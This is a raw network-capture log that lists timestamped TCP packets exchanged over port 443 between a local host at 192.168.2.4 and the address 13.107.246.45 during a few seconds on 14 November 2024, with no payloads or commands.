                            Nov 14, 2024 23:39:11.326931000 CET55249443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.326936007 CET4435524913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.365360022 CET4435524613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.365504026 CET4435524613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.365587950 CET55246443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.365628958 CET55246443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.365644932 CET4435524613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.365683079 CET55246443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.365689993 CET4435524613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.367624998 CET55251443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.367656946 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.367712975 CET55251443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.367826939 CET55251443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.367834091 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.414788008 CET4435524713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.415090084 CET4435524713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.415280104 CET55247443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.415281057 CET55247443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.415281057 CET55247443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.417016029 CET55252443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.417099953 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.417407990 CET55252443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.417408943 CET55252443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.417536020 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.436835051 CET4435524813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.436860085 CET4435524813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.436901093 CET4435524813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.436980009 CET55248443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.436980963 CET55248443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.437097073 CET55248443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.437098026 CET55248443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.437139034 CET4435524813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.437169075 CET4435524813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.438816071 CET55253443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.438838005 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.439027071 CET55253443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.439141989 CET55253443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.439147949 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.458055973 CET4435524913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.458199978 CET4435524913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.458247900 CET55249443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.458271980 CET55249443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.458288908 CET4435524913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.458302021 CET55249443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.458307981 CET4435524913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.460689068 CET55254443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.460773945 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.460841894 CET55254443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.460963964 CET55254443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.460982084 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.493172884 CET55245443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.493236065 CET4435524513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.727559090 CET55247443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.727621078 CET4435524713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.935220957 CET4435525013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.935525894 CET55250443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.935584068 CET4435525013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:11.935956955 CET55250443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:11.936009884 CET4435525013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.067540884 CET4435525013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.067692041 CET4435525013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.067890882 CET55250443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.068001032 CET55250443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.068044901 CET4435525013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.068073034 CET55250443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.068088055 CET4435525013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.070979118 CET55255443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.071010113 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.071336031 CET55255443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.071647882 CET55255443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.071659088 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.127973080 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.128958941 CET55251443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.128958941 CET55251443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.128974915 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.128992081 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.153584957 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.154129028 CET55252443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.154217005 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.154978037 CET55252443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.155033112 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.181854963 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.182564974 CET55253443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.182579994 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.186568022 CET55253443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.186574936 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.206368923 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.206825018 CET55254443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.206887007 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.207323074 CET55254443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.207377911 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.269984961 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.270600080 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.270819902 CET55251443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.270896912 CET55251443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.270920038 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.270948887 CET55251443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.270955086 CET4435525113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.273477077 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.273535013 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.273646116 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.273796082 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.273811102 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.302977085 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.303054094 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.303148031 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.303200960 CET55252443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.303530931 CET55252443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.303594112 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.304177046 CET55252443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.304240942 CET4435525213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.306204081 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.306243896 CET4435525713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.306616068 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.306962967 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.306982040 CET4435525713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.316073895 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.316613913 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.316885948 CET55253443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.317051888 CET55253443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.317051888 CET55253443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.317065001 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.317075968 CET4435525313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.319853067 CET55258443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.319912910 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.319991112 CET55258443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.320136070 CET55258443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.320151091 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.338963985 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.339030981 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.339104891 CET55254443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.339348078 CET55254443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.339348078 CET55254443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.339391947 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.339421988 CET4435525413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.341972113 CET55259443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.342056036 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.344615936 CET55259443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.344890118 CET55259443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.344924927 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.810523033 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.810863018 CET55255443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.810893059 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.811218977 CET55255443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.811224937 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.939943075 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.940089941 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.940141916 CET55255443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.940172911 CET55255443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.940190077 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.940205097 CET55255443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.940212965 CET4435525513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.941947937 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.942003965 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:12.942054987 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.942178965 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:12.942194939 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.024158001 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.024641037 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.024703979 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.025000095 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.025052071 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.055694103 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.056009054 CET55258443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.056045055 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.056380033 CET55258443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.056391954 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.071621895 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.072025061 CET55259443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.072084904 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.072257996 CET55259443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.072272062 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.080796957 CET4435525713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.081079960 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.081094980 CET4435525713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.081393003 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.081403971 CET4435525713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.154772043 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.154840946 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.154936075 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.155002117 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.155003071 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.155095100 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.155095100 CET55256443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.155137062 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.155167103 CET4435525613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.157151937 CET55261443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.157244921 CET4435526113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.157332897 CET55261443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.157469034 CET55261443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.157491922 CET4435526113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.192617893 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.192661047 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.192709923 CET55258443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.192975998 CET55258443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.192975998 CET55258443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.193041086 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.193073034 CET4435525813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.194717884 CET55262443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.194802046 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.195033073 CET55262443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.195033073 CET55262443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.195149899 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.198970079 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.199134111 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.199300051 CET55259443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.199414968 CET55259443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.199414968 CET55259443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.199456930 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.199486017 CET4435525913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.205934048 CET55263443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.206018925 CET4435526313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.206099987 CET55263443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.207336903 CET55263443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.207418919 CET4435526313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.257919073 CET4435525713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.258068085 CET4435525713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.258234024 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.258234024 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.258234024 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.263581038 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.263664961 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.263740063 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.264178038 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.264214993 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.555501938 CET55257443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.555563927 CET4435525713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.686443090 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.687163115 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.687256098 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.687815905 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.687869072 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.819191933 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.819259882 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.819406986 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.819411039 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.819477081 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.819477081 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.819528103 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.819633007 CET55260443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.819650888 CET4435526013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.824347019 CET55265443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.824373007 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.824424028 CET55265443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.824917078 CET55265443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.824928999 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.953519106 CET4435526313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.954886913 CET55263443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.954974890 CET4435526313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.955905914 CET55263443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.955960989 CET4435526313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.976138115 CET4435526113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.976900101 CET55261443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.976960897 CET4435526113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.977626085 CET55261443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:13.977641106 CET4435526113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:13.999722958 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.000371933 CET55262443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.000417948 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.002592087 CET55262443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.002607107 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.024943113 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.025378942 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.025404930 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.026587963 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.026596069 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.088507891 CET4435526313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.088815928 CET4435526313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.089010000 CET55263443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.089010000 CET55263443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.089102983 CET55263443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.089140892 CET4435526313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.090877056 CET55266443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.090912104 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.091043949 CET55266443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.091114044 CET55266443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.091120005 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.107652903 CET4435526113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.107990980 CET4435526113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.108211040 CET55261443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.108211040 CET55261443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.108365059 CET55261443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.108403921 CET4435526113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.109864950 CET55267443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.109893084 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.110018015 CET55267443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.110111952 CET55267443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.110125065 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.131721973 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.131743908 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.131778002 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.131871939 CET55262443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.131985903 CET55262443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.131985903 CET55262443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.132030010 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.132061958 CET4435526213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.133759022 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.133846045 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.134023905 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.134023905 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.134094954 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.166721106 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.166795969 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.166903973 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.167005062 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.167005062 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.167005062 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.167088985 CET55264443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.167105913 CET4435526413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.168637991 CET55269443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.168661118 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.168853045 CET55269443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.168941021 CET55269443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.168946981 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.554867983 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.555862904 CET55265443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.555890083 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.558581114 CET55265443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.558589935 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.684866905 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.685019970 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.685204029 CET55265443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.685565948 CET55265443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.685589075 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.685619116 CET55265443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.685625076 CET4435526513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.689739943 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.689832926 CET4435527013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.690967083 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.690968037 CET55270443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.691101074 CET4435527013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.844196081 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.844883919 CET55267443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.844903946 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.845566988 CET55267443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.845577955 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.856384039 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.857420921 CET55266443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.857422113 CET55266443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.857485056 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.857541084 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.864325047 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.864852905 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.864940882 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.865560055 CET55268443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.865612984 CET4435526813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.910655975 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.911375999 CET55269443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.911375999 CET55269443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.911406994 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.911421061 CET4435526913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.974114895 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.974283934 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.974339008 CET55267443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.975405931 CET55267443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.975420952 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.975447893 CET55267443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:14.975452900 CET4435526713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.991218090 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.991297007 CET4435526613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:14.991358995 CET4435526613.107.246.45192.168.2.4
